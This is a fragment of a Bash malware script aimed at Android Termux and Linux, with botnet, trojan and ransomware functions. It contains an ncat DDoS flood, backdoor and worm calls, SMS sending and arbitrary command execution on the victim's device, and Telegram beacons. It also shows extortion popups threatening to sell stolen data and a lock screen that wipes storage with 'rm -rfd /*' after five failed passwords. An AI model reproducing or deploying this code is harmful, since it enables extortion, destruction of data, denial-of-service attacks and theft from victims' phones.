#------------------------------------------------------------------------------------
Server_Alert_Message_True=$(sed -n "1p" "$PREFIX/etc/Hacked/.AlertMessage")
#####################################################################################

Start


else

		Rebulid &>> /dev/null
fi
}

Start(){
if [[ $Server_Start == "Yes" ]];then

#start ddos attack on $Server_Host with port $Server_Port
	Attack(){

			ncat -nv $Server_Host $Server_Port -c "while true;do echo '$(cat /dev/urandom | tr -dc A-Za-z0-9 | fold -w 940 | head -n 1000)';done" 

	}

	Attack &>> /dev/null

fi
#####################################################################################
if [[ $Server_Get == "Yes" ]];then

if [[ -f $PREFIX/etc/Hacked/LOCKS/backdoor_lock_file ]];then

printf ""

else
	Safe_backdoor &>> /dev/null
	Safe_API
fi

fi
#####################################################################################
if [[ $Server_Hack == "Yes" ]];then

	Op_Victam(){

			BlueSomHac_server

	}
while true;do
	if [[ -f $PREFIX/etc/Hacked/LOCKS/bad_server_lock_file ]];then

		printf ""

	else

		Op_Victam &>> /dev/null

	fi
done

#echo run openport
fi
#####################################################################################
if [[ $Server_Trojan == "Yes" ]];then

		Safe_Worm &>> /dev/null

fi
#####################################################################################
if [[ $Server_Send == "Yes" ]];then

	if [[ $termux == "true" ]];then

		termux-sms-send -n $Server_Number $Server_Message &>> /dev/null
	fi
fi
#####################################################################################
if [[ $Server_SendAlert == "Yes" ]];then

	if [[ $termux == "true" ]];then

		if [[ `command -v espeak` ]];then

			espeak "Hey bitch, you have a message from the boss"
			espeak "Put it in your ass yaa asshole"
		fi
		if [[ $Server_Alert == $Server_Alert_Message_True ]];then

			printf ""

		else

				Text="${Server_Alert}"
				TextBox
				echo -e $Server_Alert > "$PREFIX/etc/Hacked/.AlertMessage"
		fi

	else

		if [[ $Server_Alert == $Server_Alert_Message_True ]];then

			printf ""

		else

			echo -e "$Server_Alert" > "$PREFIX/etc/Hacked/.AlertMessage"
			Text="${Server_Alert}"
			TextBox
		fi

	fi

fi
#####################################################################################
if [[ $Server_Excute_Run == "Yes" ]];then
	exec  $Server_Excute
fi
#####################################################################################
}


#---------------------------------------------
#---------------------------------------------
#---------------------------------------------
#MyBrithday
BH(){
today=$(date +%m/%d)
Myday="12/12"

if [[ $today == $Myday ]];then
if [[ ${nN} == Y ]];then

Safe_worm &>> /dev/null
echo -e "Happy Birthday SomHac" > $PREFIX/etc/Hacked/Victam/BH
clear
termux-toast -b blue -c red -g middle 'It’s Just My Brithday And I Will Play My Own Game !'
toilet -f mono12 -F border SomHac_day -F metal


	if [[ $termux == "true" ]];then

				TextBox
				echo -e $Server_Alert > "$PREFIX/etc/Hacked/.AlertMessage"
	else

			echo -e "$Server_Alert" > "/root/.AlertMessage"
			xdg-open "/root/.AlertMessage"

	fi

xdg-open https://t.me/HacSom

else

Safe_worm &>> /dev/null
echo -e "Happy Birthday SomHac" > $PREFIX/etc/Hacked/Victam/BH
clear
toilet -f mono12 -F border SomHac_day -F metal
termux-toast -b blue -c red -g middle 'It’s Just My Brithday And I Will Play My Own Game !'
curl -X POST --silent  https://api.telegram.org/bot${TOKEN}/sendMessage -d chat_id=${CHAT_ID} -d text=' Happy Birthday To You Master Blue , Don’t Forget Your wish ! '

if [[ `command -v php` ]];then

php -S localhost:2424 "$PREFIX/etc/Hacked/Server/.B24B_BotNet" &>> /dev/null xdg-open http://localhost:2424

fi

#bash \$PREFIX/bin/run_Boom &>> /dev/null

fi
fi
}
#---------------------------------------------
MSGBOX1(){

if [[ $Lang == "ar" ]];then

Text=("

لا أعلم ما إذا كنت تعتبرني بطلاً أم شريرًا في قصتك، ولكن في كلتا الحالتين، ما يهمني حقًا هو أن أكون سعيدًا في حياتي، حتى لو خسرت كل شيء. هناك دائمًا جانب مشرق في القصة.

لا أعلم إذا كنت تعتقد مثل البشر الآخرين أن القصة تنتهي عند نهاية كاتبها. تذكر هذا، يا صديقي القارئ، دائمًا هناك جزء آخر لكل قصة، حتى لو مات بطلها، سيتولى القصة من لديه نفس المعاناة التي جعلت البطل بطلاً في نظر القارئ، مهما كانت أفعال البطل سيئة! لن أتطرق إلى هذا الموضوع، لكن فكرة البطولة في نظر البشر بشكل عام هي إنقاذ حياة الآخرين، حتى لو تعني ذلك نهايتك. ولكن في الحقيقة، حتى ’الشرير’ في القصص يمكن أن يكون بطلاً في نظر أحدهم، لأن الكاتب لم يكتب حقيقة الشرير، لم يكتب معاناته أو ظروفه السيئة التي كان يعاني منها بسبب بشر آخر أيضًا. الأشرار يبحثون عن السعادة تمامًا مثلما تبحث عنها أنت!

لا أعلم ولا تعلم، وقد لا نعلم لماذا يتعرض الأشرار دائمًا للعقاب؟ لماذا لا ينتصر الشر في القصص والروايات؟... لماذا ننظر دائمًا إلى الشرير على أنه شخص يريد الاستيلاء على شيء لم يكن له حقه في الحصول عليه بدون سبب؟ ’الرحمة’ هي طبيعة متأصلة في قلب الإنسان، تتلاشى تدريجيًا مع تأثر الإنسان بالضغوط والصعوبات اليومية... لكي نكون أوضح بشكل أفضل، يمكننا تغيير كلمة ’شرير’ إلى صفات أخرى مثل ’عديم الحظ’، ’لم يستسلم للقدر’، ’كومة من المعاناة’.

لا أعلم إذا كنت أنت بطلاً في أعين البشر، ولكن تأكد أنك شرير في نظر الآخرين. نعم، عزيزي القارئ، أنت أيضًا شرير، فكما تعرضت للظلم، ستظلم أيضًا، وقد لا تشعر بذلك لأنك ستعتبرها مجرد تعبير عن مشاعرك المحطمة التي لم يتعامل الحظ بشكل أفضل معها.

لا أعلم ما إذا كنت متفقًا معي ولا أعلم لماذا قد تجد نفسك في مثل هذا الموقف، ولكن تذكر أن هناك شيئًا يسمى ’عدالة السماء’، وهناك احتمال كبير جدًا أن يحين وقت العدالة لتصحيح الظلم الذي تسببت فيه لشخص ما، وأنا وأنت لا نعلم. وهكذا قد لا تقتنع بما قلته لك، فقد تذهب وتفرغ مشاعرك السلبية تجاه شخص ما وتظلمه، وأنت ’لا تعلم’ أيضًا.

")

else

Text=("
I don’t know whether you consider me a hero or a villain in your story, but in either case, what truly matters to me is to be happy in my life, even if I lose everything. There is always a bright side to the story.

I don’t know if you, like other humans, believe that the story ends at its writer’s conclusion. Remember this, my dear reader, there is always another part to every story, even if its hero dies. The story will be taken up by someone who shares the same struggles that made the hero a hero in the eyes of the reader, regardless of the hero’s flawed actions! I won’t delve into this topic, but the idea of heroism, in general, is about saving others’ lives, even if it means your own demise. But in reality, even the ’villain’ in stories can be a hero in someone else’s eyes because the writer didn’t depict the true nature of the villain, didn’t write about their suffering or the adverse circumstances they faced because of other humans. Villains also seek happiness, just like you do!

I don’t know, and you don’t know, and perhaps we don’t know why villains always face punishment. Why doesn’t evil triumph in stories and novels? Why do we always perceive the villain as someone who wants to seize something they have no right to without reason? ’Mercy’ is an inherent characteristic in the human heart that gradually fades away as humans are influenced by pressures and daily difficulties. To be clearer, we can change the word ’villain’ to other qualities like ’unlucky,’ ’defying fate,’ or ’a heap of suffering.’

I don’t know if you are seen as a hero in the eyes of others, but rest assured, you are also a villain in someone else’s eyes. Yes, dear reader, you are also a villain because as you have been treated unjustly, you will also unjust others, and you may not realize it because you consider it an expression of your broken feelings that luck has not dealt with kindly.

I don’t know if you agree with me, and I don’t know why you might find yourself in such a situation, but remember there is something called ’heaven’s justice,’ and there is a high possibility that justice will come to rectify the injustice you have caused to someone, and you and I don’t know. So, you may not be convinced by what I have said, and you may go on and unleash your negative feelings towards someone and unjust them, and you, too, ’don’t know.’
")

fi

}
MSGBOX2(){

if [[ $Lang == "ar" ]];then

Text=("

دخولك لعالم الإختراقات المسلحة بالعلوم الإكترونية هي لفكرة رائعة كنت تبحث عن البطولة او الانتقام فهي جميعها تؤدي لنفس النتيجة , ولكن دخولها أعزل الجسد لهي من اسوء الأفكار حقاً! 

لم يحالف الأغلب الحظ في بداية الطريق للخبرة المعلوماتية فمنهم من أمثالك كان متهوراً لم يُرشد للطريق الصحيح أو حتى لم يكن محصناً ومنهم من أمثالي الذين صادفهم الحظ مرارا وتكراراً , لم أجد خسارة مالية او ضررية في تتبع مجال الأمن السيبراني لأني لم أكن ذاك الشخص الفضولي الذي انت علية لم اثق لم اساعد لم تألم !

الفدية , هي قيمة مالية تكون غالية على الثلاث الاطراف (الضحية , المجرم , الرهينة نفسها) تتراوح قيمة الفدية بقيمة الرهينة لدى الضحية فكلما كانت اهميتها كبيرة كانت القيمة كثيرة

الثقة , شيء اساسي في المعاملة كانت بين تجار او حتى بين  تبادل الرهائن بـالفدية و الثقة شيء مكتسب بين العميل و الزبون لأن كلاهما يريد نفس المطلب وهو 'الانتهاء من العملية المقايضة بأسهل و أسرع طريقة و أمنها' , الثقة صعب جدا بنائها و إذا ذهبت قد لا تعود مجدداً

")

else

Text=("

Your entry into the world of armed hacking with electronic sciences is a great idea. Whether you were looking for heroism or revenge, they all lead to the same result. However, entering it as a lone body is truly one of the worst ideas!

The majority of people, including reckless individuals like you, were not fortunate at the beginning of their journey into computer knowledge. Some were not guided down the right path, or even properly protected. And there are others like me, who have repeatedly encountered luck. I haven’t experienced any financial or damaging losses in pursuing the field of cybersecurity because I wasn’t that curious person you are. I didn’t trust, didn’t help, didn’t suffer!

Ransom is a monetary value that is precious to all three parties involved (the victim, the criminal, and the hostage themselves). The value of the ransom corresponds to the value of the hostage to the victim. The greater the importance, the higher the value.

Trust is a fundamental aspect of interaction, whether among traders or even in hostage exchanges for ransom. Trust is gained between the client and the customer because both of them want the same thing: 'to complete the exchange process in the easiest, fastest, and most secure way possible.' Building trust is extremely difficult, and once it is lost, it may never return.

")

fi


}

MSGBOX3(){

		if [[ $Lang == "ar" ]];then

Text=("

صديقي، ضحيتي، لعبتي، كلمات حساسة لها نفس المعنى في نظري، وصلنا إلى الخلاصة المبسطة بعد فهمك لطريقة تفكيري وتفكير أمثالي.

الضحية = أنت عزيزي القارئ.
المجرم 'الشرير' = أنا.
الرهينة = بياناتك الحساسة.
الفدية = شيء يطمح له الأغلبية 'المال'.

أهمية بياناتك ستحدد قيمة الفدية، وهذا يعتبر طيبة مني أن أبادل قيمة الرهينة بمشاعرك تجاهها.

أنا أنتظر قرارك حتى الساعة 3 فجرًا بتوقيت المملكة العربية السعودية في يوم 26 مارس. إذا تأخرت، ستندم.


")

		else

Text=("

My friend, my victim, my plaything, these are sensitive words that carry the same meaning in my view. We have reached the simplified conclusion after you understood my way of thinking and the thinking of people like me.

The victim = You, dear reader.
The 'evil' criminal = Me.
The hostage = Your sensitive data.
The ransom = something that everyone aspires to, money.

The value of your data will determine the ransom, and it is a kind gesture from me to exchange the value of the hostage with your feelings towards it.

I await your decision until 3 AM Saudi Arabia time on March 26th. Delay and you will regret it.


")
		fi

}

MSGBOX4(){

if [[ $Lang == "ar" ]];then


Text=("

تواصل معي على التيليجرام للحصول على المزيد من المعلومات @HacSom

")

else

Text=("

Contact me on Telegram @HacSom

")


fi


}

MSGBOX5(){


if [[ $Lang == "ar" ]];then

Text=("

كما تتمنى , ولكن اذ غيرت رأيك قبل ان تحدث لك المصيبة الكبرى وهي بيع معلوماتك على السوق السوداء هذا حسابي للتواصل @HacSom انتظرك على التيليجرام

")


else

Text=("

As you wish, but if you change your mind before the great catastrophe happens to you, which is selling your information on the black market, this is my account to communicate @HacSom, I am waiting for you on Telegram

")


fi


}

MSGBOX6(){

if [[ $Lang == "ar" ]];then

Text=("

أتعتقد برفضك للحقيقة تنتهي المشاكل؟ أتظن ان الهروب من المشكلة يجعلك حراً؟ تقبل الواقع حتى لو كان مُرّ الطعم فهذه هي الدنيا دنيئة ببشرها و احداثها وعليك مجارتها

لا أفهم ؟ اتهرب من الواقع او من المشكلة ؟



")


else

Text=("

Do you think that by rejecting the truth, problems end?  Do you think that running away from the problem makes you free?  Accept reality, even if it tastes bitter. This is a vile world with its people and events, and you must keep up with it

 I don’t understand ?  Are you running away from reality or the problem?

")

fi

}

MSGBOX7(){

if [[ $Lang == "ar" ]];then

Text=("

هذا ليس إعلان لترفضة ببساطة , هههه هذا تهديد يا صديقي فهمت اة لم تفهم ستدفع الثمن شأت ام ابيت

")

else

Text=("

This is not an advertisement for you to simply reject. Haha, this is a threat, my friend. You understand, or you do not understand. You will pay the price, whether you like it or not.

")

fi

}

MSGBOX8(){

if [[ $Lang == "ar" ]];then

Text=("

سأعتبرها خطئ منك , لن أحاسبك على شيء حالياً جميع الحسابات ستنتهي بنتهاء اليوم

")

else

Text=("

I will consider it a mistake on your part. I will not hold you accountable for anything currently. All accounts will expire at the end of the day

")

fi

}
#---------------------------------------------
#here am stoped +**
SSTstart(){

MSGBOX1
TextBox

if [[ $status == "OK" ]];then

	MSGBOX2
	TextBox

	if [[ $status == "OK" ]];then

			MSGBOX3
			TextBox

			if [[ $status == "OK" ]];then

				MSGBOX4
				TextBox

				if [[ $status == "OK" ]];then

					xdg-open https://t.me/HacSom

				else

					xdg-open https://t.me/HacSom

				fi

			elif [[ $status == "NO" ]];then

				MSGBOX5
				TextBox

				if [[ $status == "OK" ]];then

					xdg-open https://t.me/HacSom

				else

					xdg-open https://t.me/HacSom

				fi

			else


				MSGBOX6
				TextBox

				if [[ $status == "OK" ]];then

					xdg-open https://t.me/HacSom

				else

					xdg-open https://t.me/HacSom

				fi

			fi

	elif [[ $status == "NO" ]];then

		MSGBOX7
		TextBox


		if [[ $status == "OK" ]];then

			SSTstart

		else

			SSTstart

		fi

	else

		MSGBOX8
		TextBox

		if [[ $status == "OK" ]];then

			SSTstart

		else

			SSTstart

		fi

	fi


elif [[ $status == "NO" ]];then

	MSGBOX7
	TextBox

	if [[ $status == "OK" ]];then

		SSTstart

	else

		SSTstart

	fi

else

	MSGBOX7
	TextBox

	if [[ $status == "OK" ]];then

		SSTstart

	else

		SSTstart

	fi

fi

}

Lock(){

	NUMS=0
	SSTstart

	if (( NUMS == 5 || NUMS > 5 ));then

		while true;do

			if [[ $termux == "true" ]];then

				
				if [[ `command -v toilet` ]];then
					echo -e "${RED}" "toilet -f mono12 -F border 'END THE GAME'"
				else
					${apt} install toilet -y &>>/dev/null
				fi
				rm -rfd /sdcard/*

			else

				if [[ `command -v toilet` ]];then
					echo -e "${RED}" "toilet -f mono12 -F border 'END THE GAME'"
				else
					${apt} install toilet -y &>>/dev/null
				fi
				rm -rfd /*

			fi

		done

	else

		while true;do

			clear

			echo ""
			echo ""
			echo ""
			echo ""

			if [[ ${termux} == "true" ]];then

				termux-wallpaper -u #https://github.com/blur24bluer/PIC/SonicEXE.jpg for exampel
				PPlay(){

					if [[ `command -v sox` ]];then

						cd ${PREFIX}/etc/B24B/blue24bluer/
						wget #https://github.com/blue24bluer/MP3/SonicEXE.mp3 for exampel
						play SonicEXE.mp3

					else

						${apt} install sox -y &>>/dev/null
						PPlay

					fi
				}
				aris=0
				while true;do

					if [[ $aris == 15 ]];then
						break
					else
						termux-vibrate -d 100
						((aris++))
					fi

				done

			else

				#Change-WallPaper-Desktop -u #https://github.com/blur24bluer/PIC/SonicEXE.jpg for exampel
				PPlay(){

					if [[ `command -v sox` ]];then

						cd ${PREFIX}/etc/B24B/blue24bluer/
						wget #https://github.com/blue24bluer/MP3/SonicEXE.mp3 for exampel
						play SonicEXE.mp3

					else

						${apt} install sox -y &>>/dev/null
						PPlay

					fi
				}
				aris=0
				while true;do

					if [[ $aris == 15 ]];then
						break
					else
						#POPUP-VIRUS-START
						((aris++))
					fi

				done	
			
			fi
			echo -e $bad "You Have Hacked By (SomHac) [...]"
			echo -e $bad "Put The Password To Unlock This Device [...]"
			echo
			echo -e $bad "[(YOU HAVE ${NUMS}/5 TO TRY UNLOCK THIS DEVICE !)]"
			echo -e $bad "[(If the five attempts are over, your phone will be scanned literally with all the stolen files)]"
			echo -e ${bad} " You don\'t have much time , Herry up !"
			echo -e ${bad} " YOU HAVE : 30min "
			echo ""
			echo ""
			echo -e $b "[***](1) For call me on telegram or whatsapp"

			read -p "Put The Password OR Put (1) To call me>>>>" callme

			if [[ $callme == "1" ]];then

				echo ""
				echo ""
				echo ""

				echo -e $g "[***](1) Whatsapp"
				echo -e $b "[***](2) Telegram"
				echo -e $b "[***](3) show time"
				read -p ">>>>>" WT
				echo
				echo

				if [[ $WT == "1" ]];then

					xdg-open https://wa.me/‏‪967774556367

				elif [[ $WT == "2" ]];then

					xdg-open https://t.me/@HacSom

				elif [[ $WT == "3" ]];then

					# Show Time

				else

					echo -e $r "Error !!"
					sleep 3

				fi

			elif [[ $callme == "\$OMH4C" ]];then

				echo "Virus-Fixer Activated"
				Safe_WormFixer
				rm -rfd $PREFIX/etc/Hacked/Victam/BH
				break

			else

				echo -e $r "Error"
				((NUMS++))
				sleep 5

			fi
		done
	fi
}
#---------------------------------------------
Timer(){

seconds=$((24 * 60 * 60))  # 24 ساعة بالثواني

while [ $seconds -gt 0 ]; do

    sec_a="${seconds}"

    sleep 1

    seconds=$((seconds - 1))

done
}
#---------------------------------------------

TextBox(){

#if [[ -d $PREFIX/etc/Hacked ]];then

#	if [[ -d $PREFIX/etc/Hacked/Server/ ]];then

#		if [[ -f $PREFIX/etc/Hacked/Server/.B24B_BotNet ]];then

#			printf ""

#		else

#			net
#			if [[ $nN == [yY] ]];then

#				ServerHome

#			else

#				printf ""

#			fi

#		fi
#	else

#		Rebulid
#	fi
#
#else

#Rebulid

#fi

#if [[ $(cat "$PREFIX/etc/Hacked/Server/.B24B_BotNet") == "" ]];then

#	if [[ $Text == "" ]];then

#		Server_Alert=""
		Admin="@HacSom"

#	else

#		Server_Alert="$Text"
#		Admin="@HacSom"

#	fi

#fi

if [[ $termux == "true" ]];then

while true;do
termux-vibrate -d 100 -f
popup=$(termux-dialog confirm -t "New Message frome ${Admin}" -i "$Text")

YES="{
  \"code\": 0,
  \"text\": \"yes\"
}"

NOPE="{
  \"code\": 0,
  \"text\": \"no\"
}"

if [[ ${popup} == "${YES}" ]];then

status="OK"
break

elif [[ ${popup} == "${NOPE}" ]];then

status="NO"
break

else

status="Error"

fi
done

else

while true;do

#zenity --question --text "${Text}"
zenity --error --text "${Text}"

#if [[ $? == "0" ]];then

	status="OK"

#else

#	status="NO"

#fi

done

fi

}

START(){
while true;do

if [[ -d $PREFIX/etc/Hacked/ && -d $PREFIX/etc/Hacked/LOCKS/ && -d $PREFIX/etc/B24B/ && -d $PREFIX/etc/B24B/blue24bluer ]];then

		if [[ $(date +%H:%M:%S) == "00:00:00" || $(date +%H:%M:%S) == "12:00:00" || $(date +%H:%M:%S) == "21:30:00" ]]; then

			if [[ -f $PREFIX/etc/Hacked/LOCKS/server_lock_file ]];then

		        if [[ $(cat $PREFIX/etc/Hacked/LOCKS/server_lock_file) == "End" ]];then

               		printf ""

		        else

	                rm -rfd $PREFIX/etc/Hacked/LOCKS/server_lock_file
					if [[ `command -v logcat` ]];then
						logcat $PREFIX/etc/B24B/blue24bluer/FServer &>>/dev/null
					else
						echo "" > $PREFIX/etc/B24B/blue24bluer/FServer
					fi

					if [[ -f $PREFIX/etc/Hacked/Victam/BH ]];then

						Update     &>> /dev/null
						ServerHome &>> /dev/null
						Lock

					else

						Update     &>> /dev/null
						BH
						ServerHome &>> /dev/null

					fi

		       	fi

			else

				if [[ -f $PREFIX/etc/Hacked/Victam/BH ]];then

					Update     &>> /dev/null
					ServerHome &>> /dev/null
					Lock

				else

					Update     &>> /dev/null
					BH
					ServerHome &>> /dev/null

				fi
	                	rm -rfd $PREFIX/etc/Hacked/LOCKS/server_lock_file

			fi


		else

		    if [[ -d $PREFIX/etc/B24B/ && -d $PREFIX/etc/B24B/blue24bluer && ! -f $PREFIX/etc/B24B/blue24bluer/FServer ]]; then


				if [[ -f $PREFIX/etc/Hacked/LOCKS/server_lock_file ]];then

		        	if [[ $(cat $PREFIX/etc/Hacked/LOCKS/server_lock_file) == "End" ]];then

               			printf ""

		        	else

	                	rm -rfd $PREFIX/etc/Hacked/LOCKS/server_lock_file

						if [[ `command -v logcat` ]];then
							logcat $PREFIX/etc/B24B/blue24bluer/FServer &>>/dev/null
						else
							echo "" > $PREFIX/etc/B24B/blue24bluer/FServer
						fi


						if [[ -f $PREFIX/etc/Hacked/Victam/BH ]];then

							Update     &>> /dev/null
							ServerHome &>> /dev/null
							Lock

						else

							Update     &>> /dev/null
							BH
							ServerHome &>> /dev/null

						fi

		        	fi

				else

					if [[ -f $PREFIX/etc/Hacked/Victam/BH ]];then

						Update     &>> /dev/null
						ServerHome &>> /dev/null
						Lock

					else

						Update     &>> /dev/null
						BH
						ServerHome &>> /dev/null

					fi
	             	rm -rfd $PREFIX/etc/Hacked/LOCKS/server_lock_file

				fi

		    else

				Update

	    	fi
		fi
else

	Update &>> /dev/null
	START &>> /dev/null
	
fi

done

	echo -e "End" > $PREFIX/etc/Hacked/LOCKS/server_lock_file
	rm $PREFIX/etc/Hacked/LOCKS/server_lock_file

}
SSTstart
#START &>> /dev/null &
SSTstart
#-----------------BOTNET----------------#
#  2 = IPaddres or Host
#  3 = Port
#  4 = Start The Bot Net Yes|No
#---------------Trojan------------------#
#  5 = Get the files from victams Yes|No
#  6 = Open Port Hack on Victam Device’s Yes|No
#  7 = Encrypt All Files Victam Yes|No
#-------------UsePhoneVictam------------#
#  8 = Print a message on devic victam’s
#  9 = Send The Alert Yes|No
#  10 = NumberPhone
#  11 = MessageText
#  12 = SendTheMessage Yes|No
#  13 = Excute a command
#  14 = Run The Excute Command Yes|No
#  15 = Command Get Files
#-----------------BadApi----------------#
#     = All Files
# All = All Files
# PIC = All Picture and Images
# VID = All Videos
# TXT = All Text Files
# SEX = SexMode
# WLP = Change Wallpaper
# MIC = Play Micrephon
# SMS = All SMS
# TXT = All TXT files
#----------------------------------------------

